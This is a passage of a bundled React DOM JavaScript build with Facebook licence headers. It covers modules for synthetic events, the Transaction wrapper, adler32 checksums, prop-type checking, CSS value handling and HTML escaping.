rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/2009/WD-css3-transitions-20090320/#transition-events-\n * @see https://developer.mozilla.org/en-US/docs/Web/API/TransitionEvent\n */\nvar TransitionEventInterface = {\n  propertyName: null,\n  elapsedTime: null,\n  pseudoElement: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticEvent}\n */\nfunction SyntheticTransitionEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticTransitionEvent, TransitionEventInterface);\n\nmodule.exports = SyntheticTransitionEvent;\n},{\"91\":91}],98:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\nvar getEventTarget = _dereq_(114);\n\n/**\n * @interface UIEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar UIEventInterface = {\n  view: function (event) {\n    if (event.view) {\n      return event.view;\n    }\n\n    var target = getEventTarget(event);\n    if (target.window === target) {\n      // target is a window object\n      return target;\n    }\n\n    var doc = target.ownerDocument;\n    // TODO: Figure out why `ownerDocument` is sometimes undefined in IE8.\n    if (doc) {\n      return doc.defaultView || doc.parentWindow;\n    } else {\n      return window;\n    }\n  },\n  detail: function (event) {\n    return event.detail || 0;\n  }\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticEvent}\n */\nfunction SyntheticUIEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticUIEvent, UIEventInterface);\n\nmodule.exports = SyntheticUIEvent;\n},{\"114\":114,\"91\":91}],99:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticMouseEvent = _dereq_(95);\n\n/**\n * @interface WheelEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar WheelEventInterface = {\n  deltaX: function (event) {\n    return 'deltaX' in event ? event.deltaX : // Fallback to `wheelDeltaX` for Webkit and normalize (right is positive).\n    'wheelDeltaX' in event ? -event.wheelDeltaX : 0;\n  },\n  deltaY: function (event) {\n    return 'deltaY' in event ? event.deltaY : // Fallback to `wheelDeltaY` for Webkit and normalize (down is positive).\n    'wheelDeltaY' in event ? -event.wheelDeltaY : // Fallback to `wheelDelta` for IE<9 and normalize (down is positive).\n    'wheelDelta' in event ? -event.wheelDelta : 0;\n  },\n  deltaZ: null,\n\n  // Browsers without \"deltaMode\" is reporting in raw wheel delta where one\n  // notch on the scroll is always +/- 120, roughly equivalent to pixels.\n  // A good approximation of DOM_DELTA_LINE (1) is 5% of viewport size or\n  // ~40 pixels, for DOM_DELTA_SCREEN (2) it is 87.5% of viewport size.\n  deltaMode: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticMouseEvent}\n */\nfunction SyntheticWheelEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticMouseEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticMouseEvent.augmentClass(SyntheticWheelEvent, WheelEventInterface);\n\nmodule.exports = SyntheticWheelEvent;\n},{\"95\":95}],100:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\nvar OBSERVED_ERROR = {};\n\n/**\n * `Transaction` creates a black box that is able to wrap any method such that\n * certain invariants are maintained before and after the method is invoked\n * (Even if an exception is thrown while invoking the wrapped method). Whoever\n * instantiates a transaction can provide enforcers of the invariants at\n * creation time. The `Transaction` class itself will supply one additional\n * automatic invariant for you - the invariant that any transaction instance\n * should not be run while it is already being run. You would typically create a\n * single instance of a `Transaction` for reuse multiple times, that potentially\n * is used to wrap several different methods. Wrappers are extremely simple -\n * they only require implementing two methods.\n *\n * <pre>\n *                       wrappers (injected at creation time)\n *                                      +        +\n *                                      |        |\n *                    +-----------------|--------|--------------+\n *                    |                 v        |              |\n *                    |      +---------------+   |              |\n *                    |   +--|    wrapper1   |---|----+         |\n *                    |   |  +---------------+   v    |         |\n *                    |   |          +-------------+  |         |\n *                    |   |     +----|   wrapper2  |--------+   |\n *                    |   |     |    +-------------+  |     |   |\n *                    |   |     |                     |     |   |\n *                    |   v     v                     v     v   | wrapper\n *                    | +---+ +---+   +---------+   +---+ +---+ | invariants\n * perform(anyMethod) | |   | |   |   |         |   |   | |   | | maintained\n * +----------------->|-|---|-|---|-->|anyMethod|---|---|-|---|-|-------->\n *                    | |   | |   |   |         |   |   | |   | |\n *                    | |   | |   |   |         |   |   | |   | |\n *                    | |   | |   |   |         |   |   | |   | |\n *                    | +---+ +---+   +---------+   +---+ +---+ |\n *                    |  initialize                    close    |\n *                    +-----------------------------------------+\n * </pre>\n *\n * Use cases:\n * - Preserving the input selection ranges before/after reconciliation.\n *   Restoring selection even in the event of an unexpected error.\n * - Deactivating events while rearranging the DOM, preventing blurs/focuses,\n *   while guaranteeing that afterwards, the event system is reactivated.\n * - Flushing a queue of collected DOM mutations to the main UI thread after a\n *   reconciliation takes place in a worker thread.\n * - Invoking any collected `componentDidUpdate` callbacks after rendering new\n *   content.\n * - (Future use case): Wrapping particular flushes of the `ReactWorker` queue\n *   to preserve the `scrollTop` (an automatic scroll aware DOM).\n * - (Future use case): Layout calculations before and after DOM updates.\n *\n * Transactional plugin API:\n * - A module that has an `initialize` method that returns any precomputation.\n * - and a `close` method that accepts the precomputation. `close` is invoked\n *   when the wrapped process is completed, or has failed.\n *\n * @param {Array<TransactionalWrapper>} transactionWrapper Wrapper modules\n * that implement `initialize` and `close`.\n * @return {Transaction} Single transaction for reuse in thread.\n *\n * @class Transaction\n */\nvar TransactionImpl = {\n  /**\n   * Sets up this instance so that it is prepared for collecting metrics. Does\n   * so such that this setup method may be used on an instance that is already\n   * initialized, in a way that does not consume additional memory upon reuse.\n   * That can be useful if you decide to make your subclass of this mixin a\n   * \"PooledClass\".\n   */\n  reinitializeTransaction: function () {\n    this.transactionWrappers = this.getTransactionWrappers();\n    if (this.wrapperInitData) {\n      this.wrapperInitData.length = 0;\n    } else {\n      this.wrapperInitData = [];\n    }\n    this._isInTransaction = false;\n  },\n\n  _isInTransaction: false,\n\n  /**\n   * @abstract\n   * @return {Array<TransactionWrapper>} Array of transaction wrappers.\n   */\n  getTransactionWrappers: null,\n\n  isInTransaction: function () {\n    return !!this._isInTransaction;\n  },\n\n  /* eslint-disable space-before-function-paren */\n\n  /**\n   * Executes the function within a safety window. Use this for the top level\n   * methods that result in large amounts of computation/mutations that would\n   * need to be safety checked. The optional arguments helps prevent the need\n   * to bind in many cases.\n   *\n   * @param {function} method Member of scope to call.\n   * @param {Object} scope Scope to invoke from.\n   * @param {Object?=} a Argument to pass to the method.\n   * @param {Object?=} b Argument to pass to the method.\n   * @param {Object?=} c Argument to pass to the method.\n   * @param {Object?=} d Argument to pass to the method.\n   * @param {Object?=} e Argument to pass to the method.\n   * @param {Object?=} f Argument to pass to the method.\n   *\n   * @return {*} Return value from `method`.\n   */\n  perform: function (method, scope, a, b, c, d, e, f) {\n    /* eslint-enable space-before-function-paren */\n    !!this.isInTransaction() ? \"development\" !== 'production' ? invariant(false, 'Transaction.perform(...): Cannot initialize a transaction when there is already an outstanding transaction.') : _prodInvariant('27') : void 0;\n    var errorThrown;\n    var ret;\n    try {\n      this._isInTransaction = true;\n      // Catching errors makes debugging more difficult, so we start with\n      // errorThrown set to true before setting it to false after calling\n      // close -- if it's still set to true in the finally block, it means\n      // one of these calls threw.\n      errorThrown = true;\n      this.initializeAll(0);\n      ret = method.call(scope, a, b, c, d, e, f);\n      errorThrown = false;\n    } finally {\n      try {\n        if (errorThrown) {\n          // If `method` throws, prefer to show that stack trace over any thrown\n          // by invoking `closeAll`.\n          try {\n            this.closeAll(0);\n          } catch (err) {}\n        } else {\n          // Since `method` didn't throw, we don't want to silence the exception\n          // here.\n          this.closeAll(0);\n        }\n      } finally {\n        this._isInTransaction = false;\n      }\n    }\n    return ret;\n  },\n\n  initializeAll: function (startIndex) {\n    var transactionWrappers = this.transactionWrappers;\n    for (var i = startIndex; i < transactionWrappers.length; i++) {\n      var wrapper = transactionWrappers[i];\n      try {\n        // Catching errors makes debugging more difficult, so we start with the\n        // OBSERVED_ERROR state before overwriting it with the real return value\n        // of initialize -- if it's still set to OBSERVED_ERROR in the finally\n        // block, it means wrapper.initialize threw.\n        this.wrapperInitData[i] = OBSERVED_ERROR;\n        this.wrapperInitData[i] = wrapper.initialize ? wrapper.initialize.call(this) : null;\n      } finally {\n        if (this.wrapperInitData[i] === OBSERVED_ERROR) {\n          // The initializer for wrapper i threw an error; initialize the\n          // remaining wrappers but silence any exceptions from them to ensure\n          // that the first error is the one to bubble up.\n          try {\n            this.initializeAll(i + 1);\n          } catch (err) {}\n        }\n      }\n    }\n  },\n\n  /**\n   * Invokes each of `this.transactionWrappers.close[i]` functions, passing into\n   * them the respective return values of `this.transactionWrappers.init[i]`\n   * (`close`rs that correspond to initializers that failed will not be\n   * invoked).\n   */\n  closeAll: function (startIndex) {\n    !this.isInTransaction() ? \"development\" !== 'production' ? invariant(false, 'Transaction.closeAll(): Cannot close transaction when none are open.') : _prodInvariant('28') : void 0;\n    var transactionWrappers = this.transactionWrappers;\n    for (var i = startIndex; i < transactionWrappers.length; i++) {\n      var wrapper = transactionWrappers[i];\n      var initData = this.wrapperInitData[i];\n      var errorThrown;\n      try {\n        // Catching errors makes debugging more difficult, so we start with\n        // errorThrown set to true before setting it to false after calling\n        // close -- if it's still set to true in the finally block, it means\n        // wrapper.close threw.\n        errorThrown = true;\n        if (initData !== OBSERVED_ERROR && wrapper.close) {\n          wrapper.close.call(this, initData);\n        }\n        errorThrown = false;\n      } finally {\n        if (errorThrown) {\n          // The closer for wrapper i threw an error; close the remaining\n          // wrappers but silence any exceptions from them to ensure that the\n          // first error is the one to bubble up.\n          try {\n            this.closeAll(i + 1);\n          } catch (e) {}\n        }\n      }\n    }\n    this.wrapperInitData.length = 0;\n  }\n};\n\nmodule.exports = TransactionImpl;\n},{\"126\":126,\"152\":152}],101:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ViewportMetrics = {\n  currentScrollLeft: 0,\n\n  currentScrollTop: 0,\n\n  refreshScrollValues: function (scrollPosition) {\n    ViewportMetrics.currentScrollLeft = scrollPosition.x;\n    ViewportMetrics.currentScrollTop = scrollPosition.y;\n  }\n};\n\nmodule.exports = ViewportMetrics;\n},{}],102:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\n/**\n * Accumulates items that must not be null or undefined into the first one. This\n * is used to conserve memory by avoiding array allocations, and thus sacrifices\n * API cleanness. Since `current` can be null before being passed in and not\n * null after this function, make sure to assign it back to `current`:\n *\n * `a = accumulateInto(a, b);`\n *\n * This API should be sparingly used. Try `accumulate` for something cleaner.\n *\n * @return {*|array<*>} An accumulation of items.\n */\n\nfunction accumulateInto(current, next) {\n  !(next != null) ? \"development\" !== 'production' ? invariant(false, 'accumulateInto(...): Accumulated items must not be null or undefined.') : _prodInvariant('30') : void 0;\n\n  if (current == null) {\n    return next;\n  }\n\n  // Both are not empty. Warning: Never call x.concat(y) when you are not\n  // certain that x is an Array (x could be a string with concat method).\n  if (Array.isArray(current)) {\n    if (Array.isArray(next)) {\n      current.push.apply(current, next);\n      return current;\n    }\n    current.push(next);\n    return current;\n  }\n\n  if (Array.isArray(next)) {\n    // A bit too dangerous to mutate `next`.\n    return [current].concat(next);\n  }\n\n  return [current, next];\n}\n\nmodule.exports = accumulateInto;\n},{\"126\":126,\"152\":152}],103:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar MOD = 65521;\n\n// adler32 is not cryptographically strong, and is only used to sanity check that\n// markup generated on the server matches the markup generated on the client.\n// This implementation (a modified version of the SheetJS version) has been optimized\n// for our use case, at the expense of conforming to the adler32 specification\n// for non-ascii inputs.\nfunction adler32(data) {\n  var a = 1;\n  var b = 0;\n  var i = 0;\n  var l = data.length;\n  var m = l & ~0x3;\n  while (i < m) {\n    var n = Math.min(i + 4096, m);\n    for (; i < n; i += 4) {\n      b += (a += data.charCodeAt(i)) + (a += data.charCodeAt(i + 1)) + (a += data.charCodeAt(i + 2)) + (a += data.charCodeAt(i + 3));\n    }\n    a %= MOD;\n    b %= MOD;\n  }\n  for (; i < l; i++) {\n    b += a += data.charCodeAt(i);\n  }\n  a %= MOD;\n  b %= MOD;\n  return a | b << 16;\n}\n\nmodule.exports = adler32;\n},{}],104:[function(_dereq_,module,exports){\n(function (process){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactPropTypeLocationNames = _dereq_(72);\nvar ReactPropTypesSecret = _dereq_(73);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar ReactComponentTreeHook;\n\nif (typeof process !== 'undefined' && process.env && \"development\" === 'test') {\n  // Temporary hack.\n  // Inline requires don't work well with Jest:\n  // https://github.com/facebook/react/issues/7240\n  // Remove the inline requires when we don't need them anymore:\n  // https://github.com/facebook/react/pull/7178\n  ReactComponentTreeHook = _dereq_(133);\n}\n\nvar loggedTypeFailures = {};\n\n/**\n * Assert that the values match with the type specs.\n * Error messages are memorized and will only be shown once.\n *\n * @param {object} typeSpecs Map of name to a ReactPropType\n * @param {object} values Runtime values that need to be type-checked\n * @param {string} location e.g. \"prop\", \"context\", \"child context\"\n * @param {string} componentName Name of the component for error messages.\n * @param {?object} element The React element that is being type-checked\n * @param {?number} debugID The React component instance that is being type-checked\n * @private\n */\nfunction checkReactTypeSpec(typeSpecs, values, location, componentName, element, debugID) {\n  for (var typeSpecName in typeSpecs) {\n    if (typeSpecs.hasOwnProperty(typeSpecName)) {\n      var error;\n      // Prop type validation may throw. In case they do, we don't want to\n      // fail the render phase where it didn't fail before. So we log it.\n      // After these have been cleaned up, we'll let them throw.\n      try {\n        // This is intentionally an invariant that gets caught. It's the same\n        // behavior as without this statement except with a better message.\n        !(typeof typeSpecs[typeSpecName] === 'function') ? \"development\" !== 'production' ? invariant(false, '%s: %s type `%s` is invalid; it must be a function, usually from React.PropTypes.', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName) : _prodInvariant('84', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName) : void 0;\n        error = typeSpecs[typeSpecName](values, typeSpecName, componentName, location, null, ReactPropTypesSecret);\n      } catch (ex) {\n        error = ex;\n      }\n      \"development\" !== 'production' ? warning(!error || error instanceof Error, '%s: type specification of %s `%s` is invalid; the type checker ' + 'function must return `null` or an `Error` but returned a %s. ' + 'You may have forgotten to pass an argument to the type checker ' + 'creator (arrayOf, instanceOf, objectOf, oneOf, oneOfType, and ' + 'shape all require an argument).', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName, typeof error) : void 0;\n      if (error instanceof Error && !(error.message in loggedTypeFailures)) {\n        // Only monitor this failure once because there tends to be a lot of the\n        // same error.\n        loggedTypeFailures[error.message] = true;\n\n        var componentStackInfo = '';\n\n        if (\"development\" !== 'production') {\n          if (!ReactComponentTreeHook) {\n            ReactComponentTreeHook = _dereq_(133);\n          }\n          if (debugID !== null) {\n            componentStackInfo = ReactComponentTreeHook.getStackAddendumByID(debugID);\n          } else if (element !== null) {\n            componentStackInfo = ReactComponentTreeHook.getCurrentStackAddendum(element);\n          }\n        }\n\n        \"development\" !== 'production' ? warning(false, 'Failed %s type: %s%s', location, error.message, componentStackInfo) : void 0;\n      }\n    }\n  }\n}\n\nmodule.exports = checkReactTypeSpec;\n}).call(this,undefined)\n},{\"126\":126,\"133\":133,\"152\":152,\"159\":159,\"72\":72,\"73\":73}],105:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n/* globals MSApp */\n\n'use strict';\n\n/**\n * Create a function which has 'unsafe' privileges (required by windows8 apps)\n */\n\nvar createMicrosoftUnsafeLocalFunction = function (func) {\n  if (typeof MSApp !== 'undefined' && MSApp.execUnsafeLocalFunction) {\n    return function (arg0, arg1, arg2, arg3) {\n      MSApp.execUnsafeLocalFunction(function () {\n        return func(arg0, arg1, arg2, arg3);\n      });\n    };\n  } else {\n    return func;\n  }\n};\n\nmodule.exports = createMicrosoftUnsafeLocalFunction;\n},{}],106:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar CSSProperty = _dereq_(4);\nvar warning = _dereq_(159);\n\nvar isUnitlessNumber = CSSProperty.isUnitlessNumber;\nvar styleWarnings = {};\n\n/**\n * Convert a value into the proper css writable value. The style name `name`\n * should be logical (no hyphens), as specified\n * in `CSSProperty.isUnitlessNumber`.\n *\n * @param {string} name CSS property name such as `topMargin`.\n * @param {*} value CSS property value such as `10px`.\n * @param {ReactDOMComponent} component\n * @return {string} Normalized style value with dimensions applied.\n */\nfunction dangerousStyleValue(name, value, component, isCustomProperty) {\n  // Note that we've removed escapeTextForBrowser() calls here since the\n  // whole string will be escaped when the attribute is injected into\n  // the markup. If you provide unsafe user data here they can inject\n  // arbitrary CSS which may be problematic (I couldn't repro this):\n  // https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet\n  // http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/\n  // This is not an XSS hole but instead a potential CSS injection issue\n  // which has lead to a greater discussion about how we're going to\n  // trust URLs moving forward. See #2115901\n\n  var isEmpty = value == null || typeof value === 'boolean' || value === '';\n  if (isEmpty) {\n    return '';\n  }\n\n  var isNonNumeric = isNaN(value);\n  if (isCustomProperty || isNonNumeric || value === 0 || isUnitlessNumber.hasOwnProperty(name) && isUnitlessNumber[name]) {\n    return '' + value; // cast to string\n  }\n\n  if (typeof value === 'string') {\n    if (\"development\" !== 'production') {\n      // Allow '0' to pass through without warning. 0 is already special and\n      // doesn't require units, so we don't need to warn about it.\n      if (component && value !== '0') {\n        var owner = component._currentElement._owner;\n        var ownerName = owner ? owner.getName() : null;\n        if (ownerName && !styleWarnings[ownerName]) {\n          styleWarnings[ownerName] = {};\n        }\n        var warned = false;\n        if (ownerName) {\n          var warnings = styleWarnings[ownerName];\n          warned = warnings[name];\n          if (!warned) {\n            warnings[name] = true;\n          }\n        }\n        if (!warned) {\n          \"development\" !== 'production' ? warning(false, 'a `%s` tag (owner: `%s`) was passed a numeric string value ' + 'for CSS property `%s` (value: `%s`) which will be treated ' + 'as a unitless number in a future version of React.', component._currentElement.type, ownerName || 'unknown', name, value) : void 0;\n        }\n      }\n    }\n    value = value.trim();\n  }\n  return value + 'px';\n}\n\nmodule.exports = dangerousStyleValue;\n},{\"159\":159,\"4\":4}],107:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * Based on the escape-html library, which is used under the MIT License below:\n *\n * Copyright (c) 2012-2013 TJ Holowaychuk\n * Copyright (c) 2015 Andreas Lubbe\n * Copyright (c) 2015 Tiancheng \"Timothy\" Gu\n *\n * Permission is hereby granted, free of charge, to any person obtaining\n * a copy of this software and associated documentation files (the\n * 'Software'), to deal in the Software without restriction, including\n * without limitation the rights to use, copy, modify, merge, publish,\n * distribute, sublicense, and/or sell copies of the Software, and to\n * permit persons to whom the Software is furnished to do so, subject to\n * the following conditions:\n *\n * The above copyright notice and this permission notice shall be\n * included in all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,\n * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n * CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n * SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n *\n */\n\n'use strict';\n\n// code copied and modified from escape-html\n/**\n * Module variables.\n * @private\n */\n\nvar matchHtmlRegExp = /[\"'&<>]/;\n\n/**\n * Escape special characters in the given string of html.\n *\n * @param  {string} string The string to escape for inserting into HTML\n * @return {string}\n * @public\n */\n\nfunction escapeHtml(string) {\n  var str = '' + string;\n  var match = matchHtmlRegExp.exec(str);\n\n  if (!match) {\n    return str;\n  }\n\n  var escape;\n  var html = '';\n  var index = 0;\n  var lastIndex = 0;\n\n  for (index = match.index; index < str.length; index++) {\n    switch (str.charCodeAt(index)) {\n      case 34:\n        // \"\n        escape = '&quot;';\n        break;\n      case 38:\n        // &\n        escape = '&amp;';\n        break;\n      case 39:\n        // '\n        escape = '&#x27;'; // modified from escape-html; used to be '&#39'\n        break;\n      case 60:\n        // <\n        escape = '&lt;';\n        break;\n      case 62:\n        // >\n        escape = '&gt;';\n        break;\n      default:\n        continue;\n    }\n\n    if (lastIndex !== index) {\n      html += str.substring(lastIndex, index);\n    }\n\n    lastIndex = index + 1;\n    html += escape;\n  }\n\n  return lastIndex !== index ? html + str.substring(lastIndex, index) : html;\n}\n// end code copied and modified from escape-html\n\n/**\n * Escapes text to prevent scripting attacks.\n *\n * @param {*} text Text value to escape.\n * @return {string} An escaped string.\n */\nfunction escapeTextContentForBrowser(text) {\n  if (typeof text === 'boolean' || typeof text === 'number') {\n    // this shortcircuit helps perf for types that we know will never have\n    // special characters, especially given that this function is used often\n    // for numeric dom ids.\n    return '' + text;\n  }\n  return escapeHtml(text);\n}\n\nmodule.exports = escapeTextContentForBrowser;\n},{}],108:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactCurrentOwner = _dereq_(134);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactInstanceMap = _dereq_(63);\n\nvar getHostComponentFromComposite = _dereq_(115);\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\n/**\n * Returns the DOM node rendered by this element.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#reactdom.finddomnode\n *\n * @param {ReactComponent|DOMElement} componentOrElement\n * @return {?DOMElement} The root node of this element.\n */\nfunction findDOMNode(componentOrElement) {\n  if (\"development\" !== 'production') {\n    var owner = ReactCurrentOwner.current;\n    if (owner !== null) {\n      \"development\" !== 'production' ? warning(owner._warnedAboutRefsInRender, '%s is accessing findDOMNode inside its render(). ' + 'render() should be a pure function of props and state. It should ' + 'never access something that requires stale data from the previous ' + 'render, such as refs. Move this logic to componentDidMount and ' + 'componentDidUpdate instead.', owner.getName() || 'A component') : void 0;\n      owner._warnedAboutRefsInRender = true;\n    }\n  }\n  if (componentOrElement == null) {\n    return null;\n  }\n  if (componentOrElement.nodeType === 1) {\n    return componentOrElement;\n  }\n\n  var inst = ReactInstanceMap.get(componentOrElement);\n  if (inst) {\n    inst = getHostComponentFromComposite(inst);\n    return inst ? ReactDOMComponentTree.getNodeFromInstance(inst) : null;\n  }\n\n  if (typeof componentOrElement.render === 'function') {\n    !false ? \"development\" !== 'production' ? invariant(false, 'findDOMNode was called on an unmounted component.') : _prodInvariant('44') : void 0;\n  } else {\n    !false ? \"development\" !== 'production' ? invariant(false, 'Element appears to be neither ReactComponent nor DOMNode (keys: %s)', Object.keys(componentOrElement)) : _prodInvariant('45', Object.keys(componentOrElement)) : void 0;\n  }\n}\n\nmodule.exports = findDOMNode;\n},{\"115\":115,\"126\":126,\"134\":134,\"152\":152,\"159\":159,\"34\":34,\"63\":63}],109:[function(_dereq_,module,exports){\n(function (process){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar KeyEscapeUtils = _dereq_(23);\nvar traverseAllChildren = _dereq_(131);\nvar warning = _dereq_(159);\n\nvar ReactComponentTreeHook;\n\nif (typeof process !== 'undefined' && process.env && \"development\" === 'test') {\n  // Temporary hack.\n  // Inline requires don't work well with Jest:\n  // https://github.com/facebook/react/issues/7240\n  // Remove the inline requires when we don't need them anymore:\n  // https://github.com/facebook/react/pull/7178\n  ReactComponentTreeHook = _dereq_(133);\n}\n\n/**\n * @param {function} traverseContext Context passed through traversal.\n * @param {?ReactComponent} child React child component.\n * @param {!string} name String name of key path to child.\n * @param {number=} selfDebugID Optional debugID of the current internal instance.\n */\nfunction flattenSingleChildIntoContext(traverseContext, child, name, selfDebugID) {\n  // We found a component instance.\n  if (traverseContext && typeof traverseContext === 'object') {\n    var result = traverseContext;\n    var keyUnique = result[name] === undefined;\n    if (\"development\" !== 'production') {\n      if (!ReactComponentTreeHook) {\n        ReactComponentTreeHook = _dereq_(133);\n      }\n      if (!keyUnique) {\n        \"development\" !== 'production' ? warning(false, 'flattenChildren(...): Encountered two children with the same key, ' + '`%s`. Child keys must be unique; when two children share a key, only ' + 'the first child will be used.%s', KeyEscapeUtils.unescape(name), ReactComponentTreeHook.getStackAddendumByID(selfDebugID)) : void 0;\n      }\n    }\n    if (keyUnique && child != null) {\n      result[name] = child;\n    }\n  }\n}\n\n/**\n * Flattens children that are typically specified as `props.children`. Any null\n * children will not be included in the resulting object.\n * @return {!object} flattened children keyed by name.\n */\nfunction flattenChildren(children, selfDebugID) {\n  if (children == null) {\n    return children;\n  }\n  var result = {};\n\n  if (\"development\" !== 'production') {\n    traverseAllChildren(children, function (traverseContext, child, name) {\n      return flattenSingleChildIntoContext(traverseContext, child, name, selfDebugID);\n    }, result);\n  } else {\n    traverseAllChildren(children, flattenSingleChildIntoContext, result);\n  }\n  return result;\n}\n\nmodule.exports = flattenChildren;\n}).call(this,undefined)\n},{\"131\":131,\"133\":133,\"159\":159,\"23\":23}],110:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/**\n * @param {array} arr an \"accumulation\" of items which is either an Array or\n * a single item. Useful when paired with the `accumulate` module. This is a\n * simple utility that allows us to reason about a collection of items, but\n * handling the case when there is exactly one item (and we do not need to\n * allocate an array).\n */\n\nfunction forEachAccumulated(arr, cb, scope) {\n  if (Array.isArray(arr)) {\n    arr.forEach(cb, scope);\n  } else if (arr) {\n    cb.call(scope, arr);\n  }\n}\n\nmodule.exports = 